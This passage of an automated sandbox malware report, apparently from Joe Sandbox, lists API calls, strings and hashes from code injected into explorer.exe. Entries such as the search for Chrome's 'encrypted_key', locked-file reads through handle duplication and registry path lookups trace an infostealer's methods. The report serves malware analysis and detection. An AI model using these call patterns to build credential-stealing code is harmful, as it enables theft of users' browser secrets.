                                                                          • Part of subcall function 00E01953: lstrcatW.KERNEL32(00000000,?,?,?,00E02F0C), ref: 00E01990
                                                                          • Part of subcall function 00E01953: lstrcatW.KERNEL32(00000000,00E56564,?,?,00E02F0C), ref: 00E01994
                                                                        • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E01F82
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
                                                                        • String ID:
                                                                        • API String ID: 1077800024-0
                                                                        • Opcode ID: b6322e85970d860a3be38661ca46911e0791eedab0e9f697b53a71a1614637c9
                                                                        • Instruction ID: 76d9dad3e5a41ecf34ec90ece33033bc4419772a0e5f41e2b27962da88695843
                                                                        • Opcode Fuzzy Hash: b6322e85970d860a3be38661ca46911e0791eedab0e9f697b53a71a1614637c9
                                                                        • Instruction Fuzzy Hash: 8E218E712083016FDB159B21CC49E2FBBEDEFC8354F40592DF899A2190DB35C9499B22
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00E03E1E,00000000,?,00E03FA8), ref: 00E01C46
                                                                        • GetFileSize.KERNEL32(00000000,00000000,00000000,?,00E03FA8), ref: 00E01C56
                                                                        • CloseHandle.KERNEL32(00000000,?,00E03FA8), ref: 00E01C91
                                                                          • Part of subcall function 00E01000: GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
                                                                          • Part of subcall function 00E01000: RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A
                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,00E03FA8), ref: 00E01C76
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                                        • String ID:
                                                                        • API String ID: 2517252058-0
                                                                        • Opcode ID: 56965d0e9367b45dfdd4395cfec3125e96926cbb576bbaf8b616967923a3e698
                                                                        • Instruction ID: dda121a35504da73eb568eadf9f0284bf148ea43d2a1336e0f3120dca8e38363
                                                                        • Opcode Fuzzy Hash: 56965d0e9367b45dfdd4395cfec3125e96926cbb576bbaf8b616967923a3e698
                                                                        • Instruction Fuzzy Hash: BCF081312002186FD2281B26DC88E7BBA9CDB467BAB160759F515A71D0EB129C854171
                                                                        APIs
                                                                        • StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,00E03E30,00000000,00000000,?,00E03FA8), ref: 00E02FC1
                                                                        • lstrlen.KERNEL32("encrypted_key":",?,00E03FA8), ref: 00E02FCE
                                                                        • StrStrIA.SHLWAPI("encrypted_key":",00E5692C,?,00E03FA8), ref: 00E02FDD
                                                                          • Part of subcall function 00E0190B: lstrlen.KERNEL32(?,?,?,?,00000000,00E02783), ref: 00E0192B
                                                                          • Part of subcall function 00E0190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,00E02783), ref: 00E01930
                                                                          • Part of subcall function 00E0190B: lstrcat.KERNEL32(00000000,?), ref: 00E01946
                                                                          • Part of subcall function 00E0190B: lstrcat.KERNEL32(00000000,00000000), ref: 00E0194A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$lstrcat
                                                                        • String ID: "encrypted_key":"
                                                                        • API String ID: 493641738-877455259
                                                                        • Opcode ID: eba4f14c6a6673ea7d388bb0b8e25923d844c4b8e5136af1ee5a9c9f2dd308fa
                                                                        • Instruction ID: 6933742d6b57a5a29f842f043454bb11d97aa443b3af4f3b2d3db1b861a83bd1
                                                                        • Opcode Fuzzy Hash: eba4f14c6a6673ea7d388bb0b8e25923d844c4b8e5136af1ee5a9c9f2dd308fa
                                                                        • Instruction Fuzzy Hash: E1E0222270AB251FC3A66BB61C488573FAC9F422563841068F605F7163DE928849C2A8
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,readonly_shm,00000000,00000000,?,?,?), ref: 00E0BB40
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID: winDelete
                                                                        • API String ID: 3188754299-3936022152
                                                                        • Opcode ID: 34cdda06f5e4af04fad7923f36ef6366af7488af0057c2479a5a456589c22e7a
                                                                        • Instruction ID: a99f48e3c381efd4a93816e0d252a961fe432cd572f1b11e2b6815d08881104a
                                                                        • Opcode Fuzzy Hash: 34cdda06f5e4af04fad7923f36ef6366af7488af0057c2479a5a456589c22e7a
                                                                        • Instruction Fuzzy Hash: 19110431A00208EBC711ABB998419BE77B5FF91760F146165F802F72D8DB308D81DB52
                                                                        APIs
                                                                          • Part of subcall function 00E01011: GetProcessHeap.KERNEL32(00000000,00000000,?,00E01A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2), ref: 00E01020
                                                                          • Part of subcall function 00E01011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2,PortNumber,00000000,00000000), ref: 00E01027
                                                                          • Part of subcall function 00E01000: GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
                                                                          • Part of subcall function 00E01000: RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A
                                                                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 00E02EE4
                                                                        • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00E02F54
                                                                        • RegCloseKey.KERNELBASE(?), ref: 00E02F62
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                                                                        • String ID:
                                                                        • API String ID: 1066184869-0
                                                                        • Opcode ID: 95f232e294edbd51ab336015225d27b7ed4ed2e7cb3f0d774ed64ef382fc8060
                                                                        • Instruction ID: 6dbcd42678fb63579ef878936ce103dc4f9eb472c22e91d70807dc80c792c34c
                                                                        • Opcode Fuzzy Hash: 95f232e294edbd51ab336015225d27b7ed4ed2e7cb3f0d774ed64ef382fc8060
                                                                        • Instruction Fuzzy Hash: F7016231204251AFCB159F22DC09DAF7BEAEFC4391F00442DFA59B61D1DA3588C9EBA1
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: ExitInitializeProcessUninitialize
                                                                        • String ID:
                                                                        • API String ID: 4175140541-0
                                                                        • Opcode ID: 37050cf9af7f67a6a4b50207181ab94c197afbe7c2c1910909e43ea8093fc221
                                                                        • Instruction ID: 5189a028661188a703ff0da0f2178b79d766a5954b7d6617e048adbaeaf8a14a
                                                                        • Opcode Fuzzy Hash: 37050cf9af7f67a6a4b50207181ab94c197afbe7c2c1910909e43ea8093fc221
                                                                        • Instruction Fuzzy Hash: 35C04CB53453004FE6842BE25E0D7193664AB00717F405904F309B60E1DA5044448A22
                                                                        APIs
                                                                        • HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 00E09FF8
                                                                        Strings
                                                                        • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 00E0A00E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CreateHeap
                                                                        • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                                                                        • API String ID: 10892065-982776804
                                                                        • Opcode ID: ed77fe1b2868281caef6406c61e0ce8a1d1b3d1ec22b700f8f4ec08e68b1a734
                                                                        • Instruction ID: 47eab53500f450e410b142625996185959b9b79804e15344affd67c5021eb286
                                                                        • Opcode Fuzzy Hash: ed77fe1b2868281caef6406c61e0ce8a1d1b3d1ec22b700f8f4ec08e68b1a734
                                                                        • Instruction Fuzzy Hash: 5FF02B72708346BEE7311A95AC84F77679DDBA47C9F181829F985F31C2E6B1AC808331
                                                                        APIs
                                                                          • Part of subcall function 00E01000: GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
                                                                          • Part of subcall function 00E01000: RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A
                                                                        • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,00E02E83,PathToExe,00000000,00000000), ref: 00E01B16
                                                                          • Part of subcall function 00E01011: GetProcessHeap.KERNEL32(00000000,00000000,?,00E01A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2), ref: 00E01020
                                                                          • Part of subcall function 00E01011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2,PortNumber,00000000,00000000), ref: 00E01027
                                                                          • Part of subcall function 00E019E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2,PortNumber,00000000,00000000), ref: 00E01A1E
                                                                          • Part of subcall function 00E019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00E01A3C
                                                                          • Part of subcall function 00E019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00E01A75
                                                                          • Part of subcall function 00E019E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2,PortNumber,00000000,00000000), ref: 00E01A98
                                                                        Strings
                                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00E01B40
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                        • API String ID: 2162223993-2036018995
                                                                        • Opcode ID: 301a25de32bc6681784318758c35db68309d422ed93fa71ca7dffa18cad8ef0b
                                                                        • Instruction ID: 6c6d7b4c57bbb2232aed08abcc26c26137c48d8d9ab88cbcf8db1cabc313674a
                                                                        • Opcode Fuzzy Hash: 301a25de32bc6681784318758c35db68309d422ed93fa71ca7dffa18cad8ef0b
                                                                        • Instruction Fuzzy Hash: ECF02422700A4867DA122A2ADC80E37378FCBD13EB30601AEF559BB281EE166CC05660
                                                                        APIs
                                                                        • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00E0A35F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: FilePointer
                                                                        • String ID: winSeekFile
                                                                        • API String ID: 973152223-3168307952
                                                                        • Opcode ID: 8cfed313ee61a8aa8bc95cb83e82d1ee1e10ca3069d6d84b099a59f401ce3f56
                                                                        • Instruction ID: 2056779824c6276fab765b162d7c41b76a74147c556ac1feced78bb9ef248caf
                                                                        • Opcode Fuzzy Hash: 8cfed313ee61a8aa8bc95cb83e82d1ee1e10ca3069d6d84b099a59f401ce3f56
                                                                        • Instruction Fuzzy Hash: 8EF0B430615308AFD7229F64EC019BB77A9EB44321F188779F861E62D0DA70DD5496A1
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(053E0000,00000000,?), ref: 00E09EB5
                                                                        Strings
                                                                        • failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 00E09ECD
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
                                                                        • API String ID: 1279760036-667713680
                                                                        • Opcode ID: 6574da4c4cfea4735f8c9ad8cb54a4448089867f8fd7ef35adc53d4c5de30d94
                                                                        • Instruction ID: c32e0b5642780079ab76c27356db96f2f68fbdf844a97fa34f1480e20f81c33e
                                                                        • Opcode Fuzzy Hash: 6574da4c4cfea4735f8c9ad8cb54a4448089867f8fd7ef35adc53d4c5de30d94
                                                                        • Instruction Fuzzy Hash: B1E0C233A482117FC2132B85BC05F2FB7A8DB94F90F051059FA80B22A2C6B0AC55C7A2
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(053E0000,00000000,?), ref: 00E09EF8
                                                                        Strings
                                                                        • failed to HeapFree block %p (%lu), heap=%p, xrefs: 00E09F0E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID: failed to HeapFree block %p (%lu), heap=%p
                                                                        • API String ID: 3298025750-4030396798
                                                                        • Opcode ID: a939a0be50b6bde47cfd28123c69c81f12a5c7f8dab952e08a3772b5e98381dd
                                                                        • Instruction ID: 83a84a1993c382f8163b37886d8f4223eafecf1597db893622e1e3a385e651bd
                                                                        • Opcode Fuzzy Hash: a939a0be50b6bde47cfd28123c69c81f12a5c7f8dab952e08a3772b5e98381dd
                                                                        • Instruction Fuzzy Hash: 47D0C2326083027FC2011B91BC02F3B77789B90B40F081448F200B10E7C7A06494AB61
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00E02893,00000000,00000000,00000000,?), ref: 00E01B82
                                                                        • CloseHandle.KERNELBASE(00000000), ref: 00E01B8F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateFileHandle
                                                                        • String ID:
                                                                        • API String ID: 3498533004-0
                                                                        • Opcode ID: b7a239208c0c739d3fa814ad16aef07488cb4e5aab2753a7c7ab3d8d03f6f982
                                                                        • Instruction ID: 8f280edc097df92739f91e6cfef49643bf7f0aa5798d118b97ec22f3ca3ec5bf
                                                                        • Opcode Fuzzy Hash: b7a239208c0c739d3fa814ad16aef07488cb4e5aab2753a7c7ab3d8d03f6f982
                                                                        • Instruction Fuzzy Hash: 9FD0EC61252630A6D5B516267C08EA76E1C9F027BAB440A54B41DAA0D0E2148C8785E0
                                                                        APIs
                                                                          • Part of subcall function 00E01162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00E0116F
                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00E01A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2), ref: 00E01020
                                                                        • RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2,PortNumber,00000000,00000000), ref: 00E01027
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$FreeProcessQueryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2580854192-0
                                                                        • Opcode ID: 3ab24bf442019676df4ad7c162703e14ec594ec4a9f3217d5aa3785074f06ba2
                                                                        • Instruction ID: d233ff473386d8e4ae1be23bd7e467761cfd2beb519f6a742c6435c9610bd668
                                                                        • Opcode Fuzzy Hash: 3ab24bf442019676df4ad7c162703e14ec594ec4a9f3217d5aa3785074f06ba2
                                                                        • Instruction Fuzzy Hash: 0BC08C310023205AC9A827A13E0CBDA2B08CF09367F000881B509BB182CA618C8486A0
                                                                        APIs
                                                                        • GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocateProcess
                                                                        • String ID:
                                                                        • API String ID: 1357844191-0
                                                                        • Opcode ID: b04f9f331e3b427d85b2287052032de1a99c5561a16d8d5942b5c67c7acfb7f8
                                                                        • Instruction ID: 194093383e120f23f21e3b2901c1e5302025a93c9ce789be568030032e45916b
                                                                        • Opcode Fuzzy Hash: b04f9f331e3b427d85b2287052032de1a99c5561a16d8d5942b5c67c7acfb7f8
                                                                        • Instruction Fuzzy Hash: BEA002755517045FDD4857B59F0DA2A3518F744703F504944714997452D96454088721
                                                                        APIs
                                                                        • RtlZeroMemory.NTDLL(?,00000018), ref: 00E012B5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryZero
                                                                        • String ID:
                                                                        • API String ID: 816449071-0
                                                                        • Opcode ID: 14dc950f9cb4677e9432d213175ddfd027c682178344c0bf92a2716f59a8772c
                                                                        • Instruction ID: 01ba7b2600a331496ea502b38a1afe65c7361101ad847d4ec1f32700a58f80d1
                                                                        • Opcode Fuzzy Hash: 14dc950f9cb4677e9432d213175ddfd027c682178344c0bf92a2716f59a8772c
                                                                        • Instruction Fuzzy Hash: 8A110AB1A01209AFDB14DFA5D984ABEBBFCFB08341B504469F949E7250D734DD44CB60
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(00000000,00000000,00E02C8F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00E01BAA
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: a5fbc0def6f069978281ad8b6b11f44ecc153c902b8b094e9a81f0c9fd6ee79d
                                                                        • Instruction ID: b21cd452484c5e4c5e794f351e846e050cb77fb4d57bf2adc655d4a3f0590dca
                                                                        • Opcode Fuzzy Hash: a5fbc0def6f069978281ad8b6b11f44ecc153c902b8b094e9a81f0c9fd6ee79d
                                                                        • Instruction Fuzzy Hash: E7D0A933E02530C2CA7816783844892B2806B0077A31A07F4FC26FB0D0E324CCC246C0
                                                                        APIs
                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E01684
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CreateGlobalStream
                                                                        • String ID:
                                                                        • API String ID: 2244384528-0
                                                                        • Opcode ID: e8585562ef7d240a40fee2eca441dd4114544a2f2b57154f25ca03760c7085ec
                                                                        • Instruction ID: caf812863aa3a47c2dabe3362dfbadfc11c0ed9ab620e01b1167c726afbef7d8
                                                                        • Opcode Fuzzy Hash: e8585562ef7d240a40fee2eca441dd4114544a2f2b57154f25ca03760c7085ec
                                                                        • Instruction Fuzzy Hash: 26C08C30120331DFE7701BB09C09B8636D4AF197B3F060E6AE0C1AE0D0E2F508C0CA90
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00E0158A), ref: 00E01056
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: b6d5e05c98cbc75ad26228d362c5aa671b552225b08355e5e3616d4ee449b4b0
                                                                        • Instruction ID: 89bd59d3fe283e3ad87681be6669c05bb317118a0800f22afb6d1ba113f3d6c9
                                                                        • Opcode Fuzzy Hash: b6d5e05c98cbc75ad26228d362c5aa671b552225b08355e5e3616d4ee449b4b0
                                                                        • Instruction Fuzzy Hash: 92A001B07953006AFDA95762AE1BF1529289740B02F500644B3097D0D055E465048529
                                                                        APIs
                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00E04A5B,?,?,00000000,?,?,?,?,00E04B66,?), ref: 00E01065
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: FreeVirtual
                                                                        • String ID:
                                                                        • API String ID: 1263568516-0
                                                                        • Opcode ID: bcb7b70a5203dee4e56e62d340c0e91d4d215d9bed08b70fd2ddee0056b3aef2
                                                                        • Instruction ID: dd3cf5a159468466dc46d75a0f88e634956495092adad28a7b8e18b0a582560f
                                                                        • Opcode Fuzzy Hash: bcb7b70a5203dee4e56e62d340c0e91d4d215d9bed08b70fd2ddee0056b3aef2
                                                                        • Instruction Fuzzy Hash: A9A00270691B006AEDF857215E0AF1526146740B03F6049447245BA0D14DA5E0488A18
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 00E034C0
                                                                          • Part of subcall function 00E033C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 00E03401
                                                                        • OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00E037A8), ref: 00E034E9
                                                                          • Part of subcall function 00E01000: GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
                                                                          • Part of subcall function 00E01000: RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A
                                                                        • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 00E0351E
                                                                        • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 00E03541
                                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00E03586
                                                                        • DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 00E0358F
                                                                        • lstrcmpiW.KERNEL32(00000000,File), ref: 00E035B6
                                                                        • NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 00E035DE
                                                                        • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 00E035F6
                                                                        • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 00E03606
                                                                        • lstrcmpiW.KERNEL32(00000000,00000000), ref: 00E0361E
                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 00E03631
                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00E03658
                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00E0366B
                                                                        • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E03681
                                                                        • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00E036AD
                                                                        • CloseHandle.KERNEL32(?), ref: 00E036C0
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,00E037A8), ref: 00E036F5
                                                                          • Part of subcall function 00E01C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00E01CC0
                                                                          • Part of subcall function 00E01C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00E01CDA
                                                                          • Part of subcall function 00E01C9F: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00E01CE6
                                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,00E037A8), ref: 00E03707
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
                                                                        • String ID: File
                                                                        • API String ID: 3915112439-749574446
                                                                        • Opcode ID: 7aa6a0b7e64fd0fa7699c12489a8e45d4430022ac48351a75ad68a27dfabe539
                                                                        • Instruction ID: c4d273d86cff7dfe664de9879aee13ad4f913f30028a2c5a9612ce8ef87263a5
                                                                        • Opcode Fuzzy Hash: 7aa6a0b7e64fd0fa7699c12489a8e45d4430022ac48351a75ad68a27dfabe539
                                                                        • Instruction Fuzzy Hash: CF618D70204300AFD724AF71DC84B2B7BEDEB84755F401928F986B72E1DB75DA888B51
                                                                        APIs
                                                                        • memcmp.NTDLL(localhost,00000007,00000009,00000002,?,00000000,000001D8,?,00000000), ref: 00E54502
                                                                        • memcmp.NTDLL(00000000,?,?,00000002,?,00000000,000001D8,?,00000000), ref: 00E5475F
                                                                        • memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 00E54803
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: memcmp$memcpy
                                                                        • String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
                                                                        • API String ID: 231171946-1096842476
                                                                        • Opcode ID: c7471a6fa36217756bb9e612786e3a91c85850d75a61aac92ae01367832063c1
                                                                        • Instruction ID: b9d86a7eea299a9674a928eec21c399f9182d2090d57de77d9e8c3b7297b6a32
                                                                        • Opcode Fuzzy Hash: c7471a6fa36217756bb9e612786e3a91c85850d75a61aac92ae01367832063c1
                                                                        • Instruction Fuzzy Hash: 20C1F2F0A083459BDB348E18849076AB7D1AB8A31EF142D6EECD5B72C2D774D8CD8752
                                                                        APIs
                                                                          • Part of subcall function 00E06AAA: memset.NTDLL ref: 00E06AC5
                                                                        • memset.NTDLL ref: 00E25F53
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
